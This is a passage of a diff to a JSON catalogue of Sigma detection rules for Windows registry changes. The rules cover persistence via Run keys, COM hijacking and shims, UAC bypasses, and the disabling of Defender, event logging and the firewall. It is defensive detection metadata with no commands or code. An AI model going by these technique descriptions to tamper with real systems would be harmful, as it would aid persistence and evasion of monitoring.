] }, + "related": [ + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82", "value": "COM Hijacking via TreatAs" }, @@ -13254,34 +16647,18 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "value": "Disable Winevt Event Logging Via Registry" }, - { - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/10", - "falsepositive": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" - ], - "filename": "registry_set_susp_app_paths_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN", - "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.012" - ] - }, - "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", - "value": "Suspicious Values In App Paths Default Property" - }, { "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", "meta": { @@ -13295,8 +16672,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" ], "tags": [ @@ -13304,6 +16681,15 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "value": "Registry Persitence via Service in Safe Mode" }, @@ -13320,8 +16706,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://labs.f-secure.com/blog/scheduled-task-tampering/", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" ], "tags": [ @@ -13330,24 +16716,33 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "value": "Scheduled TaskCache Change by Uncommon Program" }, { - "description": "Adds a RUN key that contains a powershell keyword", + "description": "Detects potential PowerShell commands or code within registry run keys", "meta": { "author": "frack113, Florian Roth", "creation_date": "2022/03/17", "falsepositive": [ - "Legitimate admin or third party scripts" + "Legitimate admin or third party scripts. Baseline according to your environnement" ], "filename": "registry_set_powershell_in_run_keys.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" ], "tags": [ @@ -13356,7 +16751,7 @@ ] }, "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c", - "value": "Powershell in Windows Run Keys" + "value": "Suspicious Powershell In Registry Run Keys" }, { "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", @@ -13382,6 +16777,43 @@ "uuid": "b7916c2a-fa2f-4795-9477-32b731f70f11", "value": "Registry Persistence via Explorer Run Key" }, + { + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "meta": { + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "creation_date": "2018/04/11", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_persistence_globalflags.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.defense_evasion", + "attack.t1546.012", + "car.2013-01-002" + ] + }, + "related": [ + { + "dest-uuid": "6d4a7fb3-5a24-42be-ae61-6728a2b581f6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", + "value": "Potential Persistence Via GlobalFlags" + }, { "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", "meta": { @@ -13395,8 +16827,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" ], "tags": [ @@ -13427,7 +16859,41 @@ ] }, "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "value": "Persistence Via MyComputer Key and SubKeys" + "value": "Potential Persistence Via MyComputer Registry Keys" + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_persistence_shim_databases.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_databases.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.011" + ] + }, + "related": [ + { + "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", + "value": "Potential Persistence Via Shim Database Modification" }, { "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", @@ -13474,6 +16940,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "value": "Custom File Open Handler Executes PowerShell" }, @@ -13538,8 +17013,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", + "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml" ], "tags": [ @@ -13547,6 +17022,15 @@ "attack.t1137" ] }, + "related": [ + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "value": "Change Outlook Security Setting in Registry" }, @@ -13565,9 +17049,9 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://persistence-info.github.io/Data/userinitmprlogonscript.html", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://persistence-info.github.io/Data/userinitmprlogonscript.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" ], "tags": [ @@ -13600,32 +17084,50 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "90f342e1-1aaa-4e43-b092-39fda57ed11e", "value": "ETW Logging Disabled For rpcrt4.dll" }, { - "description": "Detects when a new custom protocole handler is registered", + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/05/30", + "author": "frack113", + "creation_date": "2022/08/20", "falsepositive": [ - "Legitimate applications registering a new custom protocol handler" + "Legitimate use of the dll." ], - "filename": "registry_set_register_custom_protocol_handler.yml", + "filename": "registry_set_persistence_scrobj_dll.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_register_custom_protocol_handler.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_scrobj_dll.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1546.015" ] }, - "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", - "value": "Newly Registered Protocol Handler" + "related": [ + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "value": "Potential Persistence Via Scrobj.dll COM Hijacking" }, { "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", @@ -13651,30 +17153,6 @@ "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", "value": "Allow RDP Remote Assistance Feature" }, - { - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_natural_language_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/naturallanguage6.html", - "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_natural_language_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "value": "Add DLLPathOverride Entry For Persistence" - }, { "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", "meta": { @@ -13688,13 +17166,13 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", - "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" ], "tags": [ @@ -13727,33 +17205,18 @@ "attack.t1547.010" ] }, + "related": [ + { + "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "value": "Add Port Monitor Persistence in Registry" }, - { - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_lsa_extension_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1476286368385019906", - "https://persistence-info.github.io/Data/lsaaextension.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_extension_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36", - "value": "Persistence Via LSA Extensions" - }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { @@ -13769,8 +17232,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" ], "tags": [ @@ -13796,8 +17259,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" ], "tags": [ @@ -13854,6 +17317,15 @@ "attack.t1221" ] }, + "related": [ + { + "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", "value": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)" }, @@ -13871,7 +17343,6 @@ "logsource.product": "windows", "refs": [ "https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/", - "https://attack.mitre.org/techniques/T1546/015/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml" ], "tags": [ @@ -13879,8 +17350,17 @@ "attack.t1546.015" ] }, + "related": [ + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", - "value": "Windows Registry Persistence COM Search Order Hijacking" + "value": "Potential Persistence Via COM Search Order Hijacking" }, { "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", @@ -13904,6 +17384,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "value": "UAC Bypass Abusing Winsat Path Parsing - Registry" }, @@ -13929,6 +17418,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93", "value": "UAC Bypass Using Windows Media Player - Registry" }, @@ -13954,7 +17452,7 @@ ] }, "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", - "value": "Modify Attachment Manager Settings - Attachments" + "value": "Potential Attachment Manager Settings Attachments Tamper" }, { "description": "Detects the Setting of Windows Defender Exclusions", @@ -14003,6 +17501,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", "value": "Change Winevt Event Access Permission Via Registry" }, @@ -14021,8 +17528,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" ], "tags": [ @@ -14078,9 +17585,42 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", "value": "Disable Windows Firewall by Registry" }, + { + "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/05/30", + "falsepositive": [ + "Legitimate applications registering a new custom protocol handler" + ], + "filename": "registry_set_persistence_custom_protocol_handler.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", + "value": "Potential Persistence Via Custom Protocol Handler" + }, { "description": "Detect modification for a specific user to prevent that user from being listed on the logon screen", "meta": { @@ -14102,6 +17642,15 @@ "attack.t1564.002" ] }, + "related": [ + { + "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a58209c-7ae6-4027-afb0-307a78e4589a", "value": "User Account Hidden By Registry" }, @@ -14127,6 +17676,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27", "value": "Blue Mockingbird - Registry" }, @@ -14175,6 +17733,15 @@ "attack.t1547.010" ] }, + "related": [ + { + "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e", "value": "Changing RDP Port to Non Standard Number" }, @@ -14191,10 +17758,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" ], "tags": [ @@ -14218,8 +17785,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" ], "tags": [ @@ -14227,6 +17794,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d223b46b-5621-4037-88fe-fda32eead684", "value": "New Root or CA or AuthRoot Certificate to Store" }, @@ -14243,8 +17819,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/hfiref0x/UACME", "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", + "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" ], "tags": [ @@ -14254,6 +17830,15 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa", "value": "UAC Bypass via Sdclt" }, @@ -14270,8 +17855,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/hhctrl.html", "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", + "https://persistence-info.github.io/Data/hhctrl.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" ], "tags": [ @@ -14302,6 +17887,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", "value": "Registry Disable System Restore" }, @@ -14326,6 +17920,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "73a883d0-0348-4be4-a8d8-51031c2564f8", "value": "Potential Registry Persistence Attempt Via Windows Telemetry" }, @@ -14353,11 +17956,34 @@ "attack.t1546" ] }, + "related": [ + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", "value": "Outlook C2 Registry Key" }, { - "description": "Detects the modification of the registry of the currently logged in user to disable PowerShell module logging, script block logging or transcription and script execution logging", + "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", "meta": { "author": "frack113", "creation_date": "2022/04/02", @@ -14365,7 +17991,7 @@ "Unknown" ], "filename": "registry_set_powershell_logging_disabled.yml", - "level": "medium", + "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ @@ -14377,8 +18003,17 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "value": "PowerShell Logging Disabled" + "value": "PowerShell Logging Disabled Via Registry Key Tampering" }, { "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", @@ -14440,8 +18075,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", + "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" ], "tags": [ @@ -14449,9 +18084,42 @@ "attack.t1137" ] }, + "related": [ + { + "dest-uuid": 